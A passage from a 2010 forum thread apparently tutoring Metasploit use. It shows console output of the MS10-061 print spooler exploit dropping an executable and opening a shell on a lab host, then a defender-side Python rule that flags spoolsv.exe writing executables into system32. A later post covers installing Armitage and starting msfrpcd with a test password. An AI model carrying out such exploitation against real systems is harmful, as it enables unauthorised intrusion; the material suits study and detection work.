    [*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.25.147[\spoolss] ...
    [*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.25.147[\spoolss] ...
    [*] Attempting to exploit MS10-061 via \\192.168.25.147\Lexmark1 ...
    [*] Printer handle: 0000000092e4d269f911344c9b69d159ed732a4e
    [*] Job started: 0x4
    [*] Wrote 73802 bytes to %SystemRoot%\system32\7FnILYxzIVvGR1.exe
    [*] Job started: 0x5
    [*] Wrote bind request for \\192.168.25.147\PIPE\ATSVC (72 bytes)
    [*] Wrote 96 bytes of NetrAddJob request
    [*] Everything should be set, waiting up to two minutes for a session...
    [*] Sending stage (240 bytes) to 192.168.25.147
    [*] Command shell session 1 opened (192.168.25.106:5566 -> 192.168.25.147:1036) at Sun Dec 05 20:09:00 -0600 2010
    
    
    
    C:\WINDOWS\system32>
    An alternative, of course, to including the spoolss.rc in the default resource file is to just start the console with the -r flag, such as:
    Code:
    root@bt:~# msfconsole -r spoolss.rc

    I am using a windows/shell payload for simplicity and speed in this case. Also this brief bit on resource files is simply designed to illustrate some of the methodology that can be used.
    Last edited by iproute; 12-07-2010 at 05:28 AM.
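
    Added example (not from iproute's post and not Metasploit code), taking the exploit output above from the defender's side: the line "Wrote 73802 bytes to %SystemRoot%\system32\7FnILYxzIVvGR1.exe" is the print spooler writing a randomly named executable into system32, which is not something spoolsv.exe does in normal operation. The check below runs over constructed Sysmon-style FileCreate events (JSON lines in the shape of Event ID 11; the event format and the benign events are assumptions for this example, the dropped file name is the one from the post) and flags only the spooler writing an executable into system32.

```python
"""Flag print-spooler executable drops into system32 (the MS10-061 pattern in the post's
exploit output) from Sysmon-style FileCreate (Event ID 11) events."""
import json
import ntpath  # parses Windows paths correctly on any OS
import re

# Constructed sample events, not a real capture. The first is the drop seen in the post;
# the second is a normal spool file; the third is a legitimate executable write by
# another process; the fourth is not a FileCreate event at all.
SAMPLE_EVENTS = [
    r'{"EventID": 11, "Image": "C:\\WINDOWS\\system32\\spoolsv.exe", "TargetFilename": "C:\\WINDOWS\\system32\\7FnILYxzIVvGR1.exe"}',
    r'{"EventID": 11, "Image": "C:\\WINDOWS\\system32\\spoolsv.exe", "TargetFilename": "C:\\WINDOWS\\system32\\spool\\PRINTERS\\00004.SPL"}',
    r'{"EventID": 11, "Image": "C:\\WINDOWS\\servicing\\TrustedInstaller.exe", "TargetFilename": "C:\\WINDOWS\\system32\\notepad.exe"}',
    r'{"EventID": 1, "Image": "C:\\WINDOWS\\system32\\spoolsv.exe", "TargetFilename": ""}',
]

EXECUTABLE_EXT = {".exe", ".dll", ".scr", ".com"}


def looks_random(name):
    """Heuristic for machine-generated names such as 7FnILYxzIVvGR1: only letters and
    digits, at least 8 characters, and a mix of upper case, lower case and digits."""
    return bool(
        len(name) >= 8
        and re.fullmatch(r"[A-Za-z0-9]+", name)
        and re.search(r"[a-z]", name)
        and re.search(r"[A-Z]", name)
        and re.search(r"\d", name)
    )


def is_spooler_exe_drop(event):
    """True when spoolsv.exe creates an executable directly inside a system32 directory.
    %SystemRoot% is expanded in the logged path, so only the trailing directory is checked."""
    if event.get("EventID") != 11:
        return False
    image = ntpath.basename(event.get("Image", "")).lower()
    directory, filename = ntpath.split(event.get("TargetFilename", ""))
    ext = ntpath.splitext(filename)[1].lower()
    return (
        image == "spoolsv.exe"
        and directory.lower().endswith("\\system32")
        and ext in EXECUTABLE_EXT
    )


def scan(lines):
    """Run the rule over JSON event lines and return one alert per matching event."""
    alerts = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line: skip rather than crash the scan
        if is_spooler_exe_drop(ev):
            stem = ntpath.splitext(ntpath.basename(ev["TargetFilename"]))[0]
            alerts.append({
                "file": ev["TargetFilename"],
                "image": ev["Image"],
                "random_name": looks_random(stem),
                "rule": "spoolsv.exe wrote an executable into system32 (MS10-061 pattern)",
            })
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"ALERT {a['rule']}: {a['file']} (random-looking name: {a['random_name']})")
```

    The random-name heuristic is context, not the trigger: the spooler writing any executable into system32 is the signal worth an alert on its own, and the name check just raises confidence when it matches the kind of name seen in the post.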

  7. #17
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: My Metasploit tutorial thread

    Make sure you pay attention to the Metasploit Framework Unleashed course that is available. It does see updates that coincide with the framework development and always has top quality. I was not previously aware of the Armitage GUI available for the framework until recently by checking out MSFU again. I was very impressed once I got it working correctly. Had some database issues that I believe should be isolated to myself.

    The reference for this GUI tool is here in the MSFU course, Chapter 13 - Beyond Metasploit.
    The Armitage homepage is here and has a very good manual, as well as a media section with some howto videos. It is very easy to set up and use. BT4R2 should already have your databases ready to go. I used postgres rather than mysql in this case.

    I used
    Code:
    root@bt:~# apt-get update
    root@bt:~# apt-get install armitage
    root@bt:~# /etc/init.d/postgresql-8.3 start
    root@bt:~# msfrpcd -U msf -P test -t Basic &
    root@bt:~# cd /pentest/exploits/armitage/
    root@bt:/pentest/exploits/armitage# ./armitage.sh
    Then I set the DB Driver to postgres in the drop-down menu, checked SSL (if it wasn't already) and used the DB connect string:
    Code:
    postgres:password@127.0.0.1/armitage
    So far, from what I've used of it, this GUI is quite fast and effective at simplifying many metasploit tasks. Pass the hash and pivoting look to have been made very, very simple. I definitely recommend at least checking it out. Even though I generally prefer CLI, I do like this GUI.
    Last edited by iproute; 01-06-2011 at 03:28 PM.
